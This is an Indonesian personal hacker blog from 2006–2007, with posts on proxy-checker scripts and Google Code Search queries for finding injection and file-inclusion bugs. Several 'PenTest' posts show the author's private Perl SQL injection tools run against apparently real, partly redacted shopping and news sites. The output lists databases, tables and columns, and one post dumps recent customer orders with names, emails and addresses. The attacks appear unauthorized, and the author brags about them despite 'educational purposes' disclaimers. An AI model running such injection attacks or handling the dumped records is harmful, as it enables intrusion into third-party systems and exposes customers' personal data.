BLOG PRIBADIKU

personal

Saturday, June 16, 2007

Windows Vizta

Lihat screenshot desktop ku:




Percaya gak ???

:)

Monday, February 12, 2007

[TOOL] Perl direct SOCKS server's list checker

[TOOL] Perl direct SOCKS server's list checker

Many sites are provide proxy server checker and
also provide SOCKS proxy checker, but sometimes
their check result aren't valid enough, so i write
a little perl script to check/test that a SOCKS
server is alive or not, and directly connecting
to an irc server.

=====cut here=====
http://www.geocities.com/iko94/project/socks_checker_list-002.pl.txt
=====cut here=====

Remember that you must have a list called ceksocks.txt that contains
SOCKS proxy list in format :
IP:PORT or HOSTNAME:PORT
example :
192.168.0.45:1080
or
socks.exampleproxy.com:1080

POC :
=====example=====
E:\data\proxy>socks_checker_list-002.pl
[*] 220.112.168.67:1080 Failure
[*] 218.68.216.123:1080 Failure
[*] 202.127.18.221:1080 Failure
[*] 200.68.150.54:1080 Failure
[*] 200.74.130.118:1080 Failure
[*] 201.245.162.38:1080 Failure
[*] 200.58.204.156:1080 Failure
[*] 200.58.224.28:1080 Failure
[*] 200.93.132.154:1080 Failure
[*] 196.40.43.218:554 Failure
[*] 200.55.134.195:1080 Failure
[*] 195.70.145.117:1080 Failure
[*] 194.108.35.202:1080 Failure
[*] 84.244.91.183:1080 Failure
[*] 85.70.72.53:1080 Failure
[*] 85.70.72.53:1080 Failure
[*] 82.99.148.16:1080 Failure
[*] 83.93.135.61:1080 Failure
[*] 83.93.135.61:1080 Failure
[*] 194.79.97.50:1080 Failure
[*] 193.227.47.198:1080 Failure
[*] 81.80.193.109:1080 Failure
[*] 81.80.193.109:1080 Failure
[*] 82.225.109.38:18844 Failure
[*] 194.51.119.108:1080 Failure
[+] Sukses XXX.145.174.1:1080
[*] 195.143.226.168:1080 Failure
[*] 88.134.242.245:1080 Failure
[*] 193.92.187.43:1080 Failure
[*] 203.198.162.124:1080 Failure
[*] 196.12.47.166:1080 Failure
[*] 210.212.85.146:1080 Failure
[*] 61.17.92.22:1080 Failure
[+] Sukses XXX.3.211.13:1080

E:\data\proxy>
=====example=====

and then plz check to the log file called socks_log2.txt.

Some points are :
[+] You can check your network use this tool to make sure
that they do not open SOCKS proxy (in the wild net)
[+] You can obtain any SOCKS proxy list at the google result:
http://www.google.co.id/search?q=SOCKS+proxy+list&sourceid=mozilla-search&start=0&start=0&ie=utf-8&oe=utf-8&client=firefox-a&rls=org.mozilla:en-US:official


OK, i think that's enough...
THX for your attentionz.


----------------------
Author : b1ma
Location : Kediri, Indonesia
Website : iko94.blogspot.com


########################
[+] THX GOD 4 everything

*very very very special greetz to:
[+][+][+] my beloved anna [+][+][+]

*special greetz to:
[+] www.neoteker.or.id : zka
[+] www.echo.or.id
[+] www.bosen.net : bosen & tioEuy
[+] all #1stlink #neoteker #e-c-h-o #batamhacker crew @ dal net
[+] all #1stlink #romance #hackers @ centrin
[+] alphacentupret, boeboe, fuzk3 kendi, sakitjiwa, ftp_geo, K_Clown
[+] y3d1ps, z3r0byt3, kawan2 lamaku : qq & tiyox, biatch-x, K-159, Cmaster4
[+] BHF-OTO & w4ck1ng peepz


[EOF]

Friday, December 15, 2006

The Complete History of Hacking

Mohon maaf, bagi yg sudah tahu, berikut ini file yang berisikan
sejarah (h|cr|phre)acking di dunia :

http://www.geocities.com/iko94/ebook/The_Complete_History_of_Hacking.pdf

tidak hanya itu, ada juga sejarah teknologi digital,robot,
telekomunikasi dan laen2.
di file tsb anda juga akan tahu bagaimana masa muda dan sepak terjang
orang2 yg sekarang menjadi legenda dunia persilatan... :)

kita berharap agar kita bisa mencontoh yg baik2 saja...
misalnya bagaimana orang2 pintar tsb bersatu untuk
membentuk suatu komunitas yg memiliki satu visi yg sama,
sehingga mereka bisa bertukar pengalaman, informasi, juga
hasil riset yg saling melengkapi.

ok, akhirnya selamat membaca... :)


--------
iko94.blogspot.com

Wednesday, November 22, 2006

Perl proxy checker using samair.ru

hi

here it is, perl proxy checker using samair.ru ,

u can supply list in there, max 15 lines manually,

see hints in the code, you can see at :
http://www.geocities.com/iko94/project/proxck-001.pl.txt


practically :

E:\data>proxck-001.pl
#########################################
# proxck-001.pl - perl proxy list checker
# using samair.ru proxy list checker
# (c) nov 2006 @ b1ma a.k.a bima_
# for educational purposes only
# GPL v.2
#########################################


Processing: www.samair.ru
[~] 167.206.216.206:6588|bad proxy or timeout
[~] 210.91.51.41:8080|bad proxy or timeout
[~] 200.71.62.100:6588|Static-IP-cr2007162100.cable.net.co - elite - speed: good
[~] 200.204.176.138:6588|bad proxy or timeout
[~] 222.165.189.95:80|bad proxy or timeout
[~] 203.94.89.112:80|bad proxy or timeout
[~] 201.53.121.30:6588|bad proxy or timeout
[~] 201.31.11.69:6588|bad proxy or timeout
[~] 203.94.89.144:80|bad proxy or timeout
[~] 201.21.222.112:6588|bad proxy or timeout
[~] 211.215.17.73:4480|bad proxy or timeout
[~] 203.94.89.44:80|bad proxy or timeout
[~] 222.165.189.64:80|bad proxy or timeout
[~] 222.165.189.14:80|bad proxy or timeout
[~] 222.165.189.77:80|bad proxy or timeout

E:\data>


xixixixixixixixi, any comments ???


./b1ma
iko94.blogspot.com

Friday, November 17, 2006

Google Code Search a.k.a. Google Bug Hunter

/*********************************************************
* Google Code Search
* a.k.a. Google Bug Hunter
*
*
* oleh : bima_ (iko94@yahoo.com)
* www.geocities.com/iko94
*
* release : nov, 17, 2006
*
* No Warranty. This tutorial is for educational use only,
* commercial use is prohibited.
*
**********************************************************/


Seperti yang kita ketahui, google mengeluarkan fitur anyar yang bisa digunakan untuk
bug hunting. Dengan Google Code Search, kita bisa mencari function definitions dan
sample code dengan hasil tempat hostingnya dan nama public source kodenya.
Coba anda lihat di :
http://www.google.com/codesearch
atau versi detil pencarian di :
http://www.google.com/codesearch/advanced_code_search

Ini contoh dari webnya :

Syntax and Examples (more about regexp syntax)
regexp Search for a regular expression
go{2}gle hello,\ world ^int printk
"exact string" Search for exact string
"compiler happy"
file:regexp Search only in files or directories matching regexp
file:\.js$ XMLHttpRequest file:include/ ioctl
file:/usr/sys/ken/slp.c "You are not expected to understand this."
package:regexp Search packages with names matching regexp.
(A package's name is its URL or CVS server information.)
package:perl Frodo package:linux-2.6 int\ printk
lang:regexp Search only for programs written in languages matching regexp
lang:lisp xml lang:"c++" sprintf.*%s
license:regexp Search only for files with licenses matching regexp.
license:bsd int\ printf -license:gpl heapsort

Ini dari FAQ - nya :
mendukung POSIX extended regular expression syntax ,
dan juga mendukung beberapa sintax perl berikut :
\w Matches a word character. (alphanumeric plus "_")
\W Matches a non-word character.
\s Matches a whitespace character.
\S Matches a non-whitespace character.
\d Matches a digit character.
\D Matches a non-digit character.




contoh nyata untuk mencari bug:

Remote File Inclusion :
http://www.google.com/codesearch?hl=en&lr=&q=%28include%7Crequire%29%28_once%29%3F%5C%28%5C%24_%28GET%7CPOST%7CREQUEST%7CCOOKIE%29&btnG=Search
http://www.google.com/codesearch?q=%28eval%29%5C%28%5C%24_%28GET%7CPOST%7CREQUEST%7CCOOKIE%29&hl=en&lr=

MySQL Injection :
http://www.google.com/codesearch?hl=en&lr=&q=mysql_query.%3F%5C%28%5B%22%27%5D%3F%28%5B%5E%29%5D%29*%5C%24_%28GET%7CPOST%7CREQUEST%7CCOOKIE%29.*%5C%29&btnG=Search

For HTTP response splitting vulnerabilities :
http://www.google.com/codesearch?hl=en&lr=&q=lang%3Aphp+header%5Cs*%5C%28%22Location%3A.*%5C%24_%28GET%7CPOST%7CCOOKIE%7CREQUEST%7CSERVER%29.*%5C%29&btnG=Search


Tentunya hasilnya adalah para source code dari software public,
untuk mencari bug-nya anda harus terlebih dahulu mempelajari source code nya
lebih lanjut, lebih baik lagi jika anda memasangnya di komputer anda sendiri,
lalu di tes dengan tool penetration tester yang anda punyai, jika anda jeli
sabar, dan beruntung... maka bisa keluarlah advisory dari anda ke BUgTRAQ.

Anda tertarik ???
Lihat saja proyek satu ini :
http://www.cipher.org.uk/index.php?p=projects/bugle.project

Happy bug hunting...



./iko
iko94.blogspot.com


########################
[+] THX GOD 4 everything

*very very very special greetz to:
[+][+][+] my beloved anna [+][+][+]

*special greetz to:
[+] www.neoteker.or.id : zka
[+] www.echo.or.id
[+] www.bosen.net : bosen & tioEuy
[+] all #1stlink #neoteker #e-c-h-o #batamhacker crew @ dal net
[+] all #1stlink #romance #hackers @ centrin
[+] alphacentupret, boeboe, fuzk3 kendi, sakitjiwa, ftp_geo, K_Clown
[+] y3d1ps, z3r0byt3, kawan2 lamaku : qq & tiyox, biatch-x, K-159, Cmaster4


kirimkan kritik && saran ke iko94@yahoo.com

[EOF]

Monday, October 23, 2006

Lanjutan PenTest SQL Injection against MS-SQL Server (Bagian III)

Just another my PRIVATE tool : dump_vpasp.pl .
Skrip ini memiliki kemampuan untuk men-dump secara otomatis
isi dari database (yg penting saja tentunya) dari VPASP.
Seperti yang anda telah ketahui, VPASP adalah aplikasi e-commerce
berbasiskan ASP dengan backend database MS-SQL Server,
di mana sebagian versinya masih menyisakan bug sql injection.

SHOW TIME :

E:\data\sqlperl\baru>dump_vpasp.pl -t "http://XXXXXXXX-XXXXX.com/shopexd.asp?id=
" -p 2 -l 10

*********************************
SQL INJECTION AUTOMATION
trying to retrieve DB content !!!

by iko94(iko94@yahoo.com)
www.geocities.com/iko94

*********************************

http://XXXXXXXX-XXXXX.com/shopexd.asp?id=
Format : XXXXXXX/XXXXX/XXXXXXXXXXX/ofirstname/olastname/oemail/ocity/oaddress/op
ostcode/ostate/ocountry/ophone/ocompany/ocardtype/XXXXXXX/XXXXXXXXX/ocardexpires
/ocardaddress/oprocessed/opaymethod/XXXXXXXXXXXXXX
[1] : 63664/Oct 23 2006 12:00AM/14.40/Zsolt/Koszik/zskoszik@freemail.hu/Biator
bagy/Szel u 6124/2051/NULL/HU/XXXXXXXXXXX/NULL
/Verisign - Pending/NULL/NULL/NULL/NULL/0/0/NULL
........snip...........
[10] : 63655/Oct 23 2006 12:00AM/32.45/Rudolf/Arenstorff/rudolf.arenstorff@sieme
ns.com/vienna/Kefedergrundgasse 3B/2/8/1210/Austria/AT/XXXXXXXXXXXXXXX/NULL
/Verisign/NULL/XXXXXXXXXXXX/NULL/NULL/0/0/XXXXXX
++++++++++++++++++++

E:\data\sqlperl\baru>

***FRESH*** ???

Fasilitas :
[+] seperti biasa, bisa memilih target dan jumlah quotenya
[+] bisa memilih berapa baris transaksi terakhir yang terjadi (***istimewa***),
contoh di atas memilih 10 baris terakhir dari transaksi yg terjadi

Ingat... ingat...
Skrip ini hanya untuk tujuan pendidikan saja, segala kerusakan yg diakibatkannya
tidak menjadi tanggungjawab penulis...
Sebagian dari output program di atas, penulis ganti dengan karakter XXX dengan
alasan keamanan.

Seperti biasa juga, skrip ini masih bersifat PRIVATE, yg mungkin akan didistribusikan
untuk kalangan terbatas...

Kendi, lo kebagian atu nih... (ditunggu aje...)

[+] THX to GOD, for everything...
[+] THX to Kendi, for the core alternative query

[EOF]

Saturday, October 21, 2006

Lanjutan PenTest SQL Injection against MS-SQL Server

Setelah mengetahui nama-nama tabel beserta kolomnya, maka iseng-iseng kita bisa melihat nama-nama databasenya :

E:\data\sqlperl\baru>sqli_loop_multi.pl -t "http://www.XXXXX.web.id/notice_news_
content.asp?id=" -p 2

*********************************
SQL INJECTION AUTOMATION
trying to retrieve DB content !!!

by iko94(iko94@yahoo.com)
www.geocities.com/iko94

use : E:\data\sqlperl\baru\sqli_loop_multi.pl -t "target_path" -p pilihan
contoh : E:\data\sqlperl\baru\sqli_loop_multi.pl -t "http://www.XXXXX.web.id/not
ice_news_content.asp?id=" -p 2

ket :
-t target_path
-p pilihan


pilihan :
0 ==> tidak ada quote di depan injek
1 ==> satu single quote di depan injek
2 ==> dua single quote di depan injek

*********************************

http://www.XXXXX.web.id/notice_news_content.asp?id=
[+] hasil : 1|master
[+] hasil : 2|tempdb
[+] hasil : 3|model
[+] hasil : 4|msdb
[+] hasil : 5|pubs
[+] hasil : 6|Northwind
[+] hasil : 7|o2jam
gak match lagi
dah selesai
++++++++++++++
dah selesai at E:\data\sqlperl\baru\sqli_loop_multi.pl line 147.

E:\data\sqlperl\baru>


xixixixixixi, wah, baik sekali MS-SQL Server mau memberitahu kita apa saja nama databasenya...
Kendi... skrip-skrip ini hampir mencapai final release (but still PRIVATE) ...
NEXT TARGET : skrip php dengan backend database MySQL...

[+] THX To GOD , for everything...

[EOF]

Friday, October 06, 2006

Speedy oh Speedy.....

Setelah membaca detikinet , saya merasa bersyukur, bahwa sampai detik ini saya belum pernah sekalipun pakai Telkom Speedy.
Berbagai keluhan konsumen, mulai dari lambatnya akses yang memakai speedy, amburadulnya sistem billing speedy, dudulsnya para CS 147, sampai dengan ketidaksesuaian antara apa yang mereka bayar dengan kualitas yang seharusnya mereka terima (bayar broadband dapatnya dial-up).

Berikut rangkuman berita tentang speedy di detikinet :
- Loss 80%, speedy ala bekicot
- Speedy, Bayar Broadband dengan Kualitas Dial-Up
- Konsumen Merasa Dibodohi 'Meteran' Speedy
- Speedy Kapan Beres? Hanya Tuhan yang Tahu...
- Speedy Bermasalah, 147 Berulah
- Speedy Lemot, Trader Valas Merugi
- Busyet Tagihan Speedy Nyasar!
- Duh Speedy, Ekspatriat pun Gregetan

Sampai akhirnya ada respon dari pihak Telkom :
- Telkom Speedy: Kami Mohon Maaf

Tidak itu saja, detikinet juga menerima khusus keluhan para pelanggan speedy (redaksi[at]detikINET[dot]com), artinya keluhan-keluhan konsumen speedy pasti lebih banyak daripada yang ada di bagian komentar berita tersebut.

Apakah kasus Telkom Speedy ini mencerminkan pelayanan dari BUMN di negeri kita ? (sok oratoris...)
Tentu anda sudah tahu sendiri jawabannya ... :)

Saya hanya bisa berdoa, semoga Pemerintah tahu kebijaksanaan apa yang harus diambilnya.....

Sunday, October 01, 2006

PenTest : SQL Injection Tools (against MS-SQL Server)

Iseng-iseng buka-buka arsip lama...
Ada dua skrip perl yg bisa digunakan untuk penetration test, tepatnya SQL Injection Tools, khusus untuk MS-SQL Server :)
Skrip-skrip ini masih bersifat PRIVATE VERSION !!!
Gak tau yach, kenapa kok aku merasa sayang menjadikannya sebagai PUBLIC VERSION...
Versi terakhir dari skrip ini, telah mengalami beberapa perbaikan :
  1. Pada bagian LWP telah diperbaiki, sehingga lebih cepat responnya
  2. Pada loop2nya, agar bisa digunakan untuk parsing hasilnya lebih bagus
  3. Pada parsing dari respon LWP, thx to kendi aka fuzk3 yang telah membantu mengetesnya
  4. Pada file logging nya, agar file log dari skrip pertama langsung bisa digunakan oleh skrip ke dua
  5. Pada query SQL nya, agar bisa digunakan untuk looping dan parsing, thx to Bang TioEuy yang telah memberikan query ampuh yang merupakan inti dari 2 skrip ini
Skrip pertama bertugas untuk men-dump nama-nama tabel di database tsb, sedang skrip ke dua bertugas men-dump nama-nama kolom nya.
Lha yg bertugas untuk men-dump isi tabel nya mana ??? Dumping isi tabel bisa dilakukan secara manual saja, karena kita tidak memerlukan isi secara keseluruhan bukan ? Hanya bagian-bagian tertentu saja dari tabel yang akan kita extract secara manual, lagian bandwith masih mahal bok...

Berikut petikan skrip pertama :

b1ma@b1ma-desktop:~/dataku/sqlperl$ ./sqli_loop_tbl.pl -t "http://www.imageXXXXXX.com/AB1235000equick/shopdisplayproducts.asp?id=" -p 2

*********************************
SQL INJECTION AUTOMATION
trying to retrieve DB content !!!

by iko94(iko94@yahoo.com)
www.geocities.com/iko94

use : ./sqli_loop_tbl.pl -t "target_path" -p pilihan
contoh : ./sqli_loop_tbl.pl -t "http://www.o2ZZZZZ.web.id/notice_news_content.asp?id=" -p 1

ket :
-t target_path
-p pilihan


pilihan :
1 ==> satu single quote di depan injek
2 ==> dua single quote di depan injek

*********************************

http://www.imageXXXXXX.com/AB1235000equick/shopdisplayproducts.asp?id=
[+] tabel : 5575058|orders
[+] tabel : 21575115|ordertracking
[+] tabel : 37575172|prodcategories
...snip...

Petikan skrip ke dua :
b1ma@b1ma-desktop:~/dataku/sqlperl$ ./sqli_loop_row.pl -t "http://www.imageXXXXXX.com/AB1235000equick/shopdisplayproducts.asp?id=" -p 2

*********************************
SQL INJECTION AUTOMATION
trying to retrieve DB content !!!

by iko94(iko94@yahoo.com)
www.geocities.com/iko94

use : ./sqli_loop_row.pl -t "target_path" -p pilihan
contoh : ./sqli_loop_row.pl -t "http://www.o2ZZZZZ.web.id/notice_news_content.asp?id=" -p 1

ket :
-t target_path
-p pilihan


pilihan :
1 ==> satu single quote di depan injek
2 ==> dua single quote di depan injek

*********************************

http://www.imageXXXXXX.com/AB1235000equick/shopdisplayproducts.asp?id=
Tabel : orders
[+] row : 1|orderid
[+] row : 2|ocustomerid
[+] row : 3|odate
[+] row : 4|orderamount
[+] row : 5|ofirstname
[+] row : 6|olastname
[+] row : 7|oemail
[+] row : 8|oaddress
[+] row : 9|ocity
[+] row : 10|opostcode

Hasil tidak cocok !
gak match lagi2
++++++++++++++++++++
Tabel : ordertracking
[+] row : 1|trackid
[+] row : 2|orderid
[+] row : 3|trackcomment
[+] row : 4|trackname
[+] row : 5|trackdate
[+] row : 6|tracktime
[+] row : 7|trackview
[+] row : 8|trackemail
[+] row : 9|trackother

Hasil tidak cocok !
gak match lagi2
++++++++++++++++++++
Tabel : prodcategories
[+] row : 1|id
[+] row : 2|intcategoryid
[+] row : 3|intcatalogid

Hasil tidak cocok !
gak match lagi2
++++++++++++++++++++
...snip...

Kemudian kita lihat file log nya :
b1ma@b1ma-desktop:~/dataku/sqlperl$ ls
sqliloop.log sqlilooprow.log sqlilooptbl.log sqlilooptblrow.log
b1ma@b1ma-desktop:~/dataku/sqlperl$ cat sqlilooptbl.log
5575058|orders
21575115|ordertracking
37575172|prodcategories
53575229|prodfeatures
69575286|products
85575343|projects
101575400|quantitydiscounts
117575457|registrant
...snip...

b1ma@b1ma-desktop:~/dataku/sqlperl$ cat sqlilooptblrow.log
orders | 1|orderid
orders | 2|ocustomerid
orders | 3|odate
orders | 4|orderamount
...snip...
ordertracking | 1|trackid
ordertracking | 2|orderid
ordertracking | 3|trackcomment
ordertracking | 4|trackname
...snip...
prodcategories | 1|id
prodcategories | 2|intcategoryid
prodcategories | 3|intcatalogid
...snip...
prodfeatures | 1|id
prodfeatures | 2|featurenum
prodfeatures | 3|featurecaption
prodfeatures | 4|featurename
...snip...
products | 1|catalogid
products | 2|ccode
products | 3|cname
products | 4|cdescription
products | 5|cprice
...snip...

Wah, kebanyakan snip dech...
Abiss panjang banget sich :)

Saya kira cukup sekian laporan langsung dari blog saya, tak lupa kritik, saran, cemo'ohan, wishlist, TODO bisa anda kirimkan ke iko94 [at] yahoo [dot] com


SHOUTz to :
  1. my beloved wife
  2. all ppl in #1stlink @ dalnet
  3. TioEuy && kendi
  4. Bosen's family (Alpret, boeboe)
  5. all ppl in #neoteker @ dalnet
  6. all of my big family
  7. my old 686 machine
  8. ubuntu && debian
  9. linus && linux
  10. larry wall && perl
Kata-kata mutiara hari ini :
The Perl motto is "There’s more than one way to do it." Divining how many more is left as an exercise to the reader.
The three principal virtues of a programmer are Laziness, Impatience, and Hubris. See the Camel Book for why.
dikutip dari manual perl.

THX GOD for everything...

[EOF]

Saturday, September 30, 2006

Beberapa tool analisa traffic jaringan

Adakalanya kita memerlukan bantuan tools yang berguna untuk meng-analisa traffic jaringan kita. Berikut ini bisa kita lihat 2 tool yang berjalan di atas Ubuntu/Debian, yang mempunyai tampilan GUI :

Ethereal



Etherape


Anda bisa bandingkan sendiri, mana yang lebih menarik ?
Silakan menginstallnya di komputer anda sendiri...
:)
 
Free Web Site Counter
Free Web Site Counter